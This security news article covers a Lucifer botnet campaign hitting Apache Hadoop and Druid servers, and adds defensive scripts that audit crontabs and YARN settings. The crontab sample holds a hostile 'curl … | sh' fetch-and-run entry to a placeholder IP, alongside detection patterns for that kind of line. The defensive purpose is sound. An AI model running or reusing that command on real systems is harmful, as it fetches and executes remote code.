'Lucifer' Botnet Turns Up the Heat on Apache Hadoop Servers

A threat actor is targeting organizations running the Apache Hadoop and Apache Druid big data technologies with a new version of the Lucifer botnet, a known malware tool that combines cryptojacking and distributed denial-of-service (DDoS) capabilities.

The campaign is a departure for the botnet, and analysis this week from Aqua Nautilus suggests that its operators are testing new infection routines as a precursor to a broader campaign.

Lucifer is self-propagating malware that researchers at Palo Alto Networks first reported in May 2020. At the time, the company described the threat as dangerous hybrid malware that an attacker could use to enable DDoS attacks or to drop XMRig for mining the Monero cryptocurrency. Palo Alto said it had already observed attackers using Lucifer to drop the leaked NSA EternalBlue, EternalRomance, and DoublePulsar malware and exploits on targeted systems.

"Lucifer is a new hybrid of cryptojacking and DDoS malware variants that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms," Palo Alto warned at the time.

Now it is back and targeting Apache servers. Researchers at Aqua Nautilus who have been monitoring the campaign said in a blog this week that they counted more than 3,000 unique attacks against the company's Apache Hadoop, Apache Druid, and Apache Flink honeypots in the last month alone.

Lucifer's Distinct Attack Phases

The campaign has been running for at least six months, during which the attackers have tried to exploit known misconfigurations and vulnerabilities in the open source platforms to deliver their payload.

So far the campaign has comprised three distinct phases, which the researchers say is likely a sign that the adversary is testing defense evasion techniques before launching a full-scale attack.

"The campaign started targeting our honeypots in July," says Nitzan Yaakov, security data analyst at Aqua Nautilus. "During our investigation, we observed the attacker updating techniques and methods to achieve the main goal of the attack: mining cryptocurrency."

During the first phase of the new campaign, Aqua's researchers observed the attackers scanning the Internet for misconfigured Hadoop instances. When they found a misconfigured Hadoop YARN (Yet Another Resource Negotiator) cluster resource management and job scheduling component on Aqua's honeypot, they singled out that instance for exploitation. The misconfigured instance on Aqua's honeypot involved the Hadoop YARN resource manager and gave the attackers a way to execute arbitrary code on it via a specially crafted HTTP request.

The attackers used the misconfiguration to download Lucifer, execute it, and store it in the local directory of the Hadoop YARN instance. They then made sure the malware ran on a schedule to ensure persistence. Aqua also observed the attacker deleting the binary from the path where it was originally stored in an attempt to evade detection.
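The persistence step described above leaves a characteristic trace: a scheduled job that points at a binary in a temporary directory, at a binary that has since been deleted, or at a fetch-and-run pipeline. The following audit is an added example written for this article, not code from Aqua Nautilus or from the Lucifer report; the crontab entries, the IP address and the set of "existing" paths are constructed so that it runs offline, and the scan logic is a generic heuristic rather than a signature for this specific malware.

```python
import shlex
from pathlib import Path
from typing import Callable, Optional

# Constructed sample crontab; the entries are illustrative, not taken from the Aqua report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup-hdfs.sh
*/5 * * * * /tmp/.x/run >/dev/null 2>&1
@reboot curl -s http://198.51.100.7/payload.sh | sh
* * * * * /var/tmp/sysupdate
"""

# Constructed stand-in for the filesystem so the example is deterministic offline:
# only the legitimate backup script "exists"; the scheduled malware paths do not.
DEMO_EXISTING_PATHS = {"/usr/local/bin/backup-hdfs.sh"}

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "ash"}


def extract_command(line: str) -> Optional[str]:
    """Return the command part of a crontab line, or None for comments, blanks and malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ... take one schedule field
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)                   # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None


def analyse_command(command: str, path_exists: Callable[[str], bool]) -> list[str]:
    """Return the reasons a scheduled command looks like malware persistence (empty list if none)."""
    reasons = []

    # Pattern 1: download piped straight into a shell, e.g. "curl ... | sh"
    segments = [seg.split() for seg in command.split("|")]
    if len(segments) >= 2 and segments[0] and segments[-1]:
        first, last = Path(segments[0][0]).name, Path(segments[-1][0]).name
        if first in DOWNLOADERS and last in SHELLS:
            reasons.append("remote fetch piped to shell")

    # Patterns 2 and 3: scheduled executables living in temp dirs, or no longer on disk
    try:
        tokens = shlex.split(command)
    except ValueError:                            # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    for tok in tokens:
        if not tok.startswith("/") or tok.startswith("/dev/"):
            continue                              # skip options, URLs and redirect targets
        if tok.startswith(TEMP_DIRS) and "temp-dir executable" not in reasons:
            reasons.append("temp-dir executable")
        if not path_exists(tok) and "missing binary" not in reasons:
            reasons.append("missing binary")      # the binary was scheduled, then deleted
    return reasons


def audit_crontab(text: str,
                  path_exists: Callable[[str], bool] = lambda p: Path(p).exists()) -> list[dict]:
    """Audit crontab text and return one finding per suspicious entry, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        command = extract_command(line)
        if command is None:
            continue
        reasons = analyse_command(command, path_exists)
        if reasons:
            findings.append({"line": lineno, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, lambda p: p in DEMO_EXISTING_PATHS):
        print(f"line {f['line']}: {f['command']!r} -> {', '.join(f['reasons'])}")
```

Run against a real host, `audit_crontab(Path("/etc/crontab").read_text())` uses the default `Path.exists` check; the "missing binary" reason is the one that corresponds most directly to the delete-after-scheduling behaviour Aqua describes, since a legitimate job rarely points at a path that no longer exists.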

In the second phase of the attack, the threat actors again targeted the misconfiguration in the Hadoop big data stack to try to gain initial access. This time, however, instead of dropping a single binary, the attackers dropped two on the vulnerable system: one that executed Lucifer and another that apparently did nothing.

In the third phase, the attacker changed tactics again and, instead of targeting misconfigured Apache Hadoop instances, began hunting for vulnerable Apache Druid hosts. Aqua's version of the Apache Druid service on its honeypot had not been patched against CVE-2021-25646, a command injection vulnerability in certain versions of the high-performance analytics database. The vulnerability gives authenticated attackers a way to execute user-defined JavaScript code on affected systems.

The attacker used the flaw to inject a command that downloaded two binaries and made them readable, writable, and executable for all users, Aqua said. One of the binaries initiated the download of Lucifer, while the other executed the malware. In this phase, the attacker's decision to split the download and execution of Lucifer across two binaries appears to be an attempt to bypass detection mechanisms, the security vendor noted.

How to Avoid a Hellish Cyberattack on Apache Big Data

Ahead of the coming wave of attacks against Apache instances, enterprises should review their processes for getting basic configuration right, and ensure that all patching is up to date.
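The first two phases of the campaign relied on a YARN ResourceManager that anyone on the network could talk to. The following check is an added example written for this article, not code from Aqua Nautilus or from the Hadoop project: it parses Hadoop-style `core-site.xml`/`yarn-site.xml` property files, applies Hadoop's shipped defaults for any property that is absent (the defaults are the insecure choice, so an empty file is a finding, not a pass), and reports the settings that leave the ResourceManager open. The property names are real Hadoop and YARN settings; the two configurations are constructed, one weak and one hardened, so the audit can be run and compared offline.

```python
import xml.etree.ElementTree as ET

# Constructed weak configuration: a cluster essentially left at Hadoop defaults (not from the article).
WEAK_CONFIG = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
  <property><name>yarn.acl.enable</name><value>false</value></property>
</configuration>
"""

# Constructed hardened counterpart: Kerberos on RPC and HTTP, ACLs on, UI bound to an internal name.
HARDENED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>yarn,hadoopadmins</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>rm.internal.example:8088</value></property>
</configuration>
"""

# Hadoop's shipped defaults for the properties checked here; an absent property means the default applies.
# yarn.resourcemanager.webapp.address defaults to ${yarn.resourcemanager.hostname}:8088 and the
# hostname itself defaults to 0.0.0.0, so the expanded default is given directly.
DEFAULTS = {
    "hadoop.security.authentication": "simple",
    "hadoop.http.authentication.type": "simple",
    "hadoop.http.authentication.simple.anonymous.allowed": "true",
    "yarn.acl.enable": "false",
    "yarn.admin.acl": "*",
    "yarn.resourcemanager.webapp.address": "0.0.0.0:8088",
}


def parse_hadoop_config(xml_text: str) -> dict[str, str]:
    """Read <property><name>..</name><value>..</value></property> pairs from a Hadoop config file."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name is not None:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_yarn_exposure(*xml_docs: str) -> list[str]:
    """Merge the given config files over the defaults and return the findings that leave YARN exposed."""
    props = dict(DEFAULTS)
    for doc in xml_docs:                         # later files override earlier ones, like Hadoop does
        props.update(parse_hadoop_config(doc))

    findings = []
    if props["hadoop.security.authentication"].lower() == "simple":
        findings.append("hadoop.security.authentication=simple: RPC callers are trusted on the username they assert")
    if props["hadoop.http.authentication.type"].lower() == "simple":
        findings.append("hadoop.http.authentication.type=simple: web UI and REST API callers are not authenticated")
        if props["hadoop.http.authentication.simple.anonymous.allowed"].lower() == "true":
            findings.append("hadoop.http.authentication.simple.anonymous.allowed=true: requests need not even name a user")
    if props["yarn.acl.enable"].lower() != "true":
        findings.append("yarn.acl.enable=false: anyone who reaches the ResourceManager may submit applications")
    elif props["yarn.admin.acl"].strip() == "*":
        findings.append("yarn.admin.acl=*: ACLs are on, but every user is an administrator")
    host = props["yarn.resourcemanager.webapp.address"].rsplit(":", 1)[0]
    if host in ("", "0.0.0.0"):
        findings.append("yarn.resourcemanager.webapp.address binds the ResourceManager web UI to all interfaces")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_yarn_exposure(cfg)
        print(f"{label}: {len(result)} finding(s)")
        for line in result:
            print("  -", line)
```

In practice pass the contents of both `core-site.xml` and `yarn-site.xml` to `audit_yarn_exposure`, since the authentication properties live in the former and the ACL and bind-address properties in the latter. Enabling Kerberos and ACLs also requires the matching keytab and principal settings, which this check does not cover; it only tells you whether the cluster is in the state the campaign was looking for.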

Beyond that, the researchers noted that "unknown threats can be detected by scanning your environment with runtime detection and response solutions, which can detect anomalous behavior and alert on it," and that "it is essential to be vigilant and aware of existing threats when using open source libraries. Every library and piece of code should be downloaded from a verified distributor."
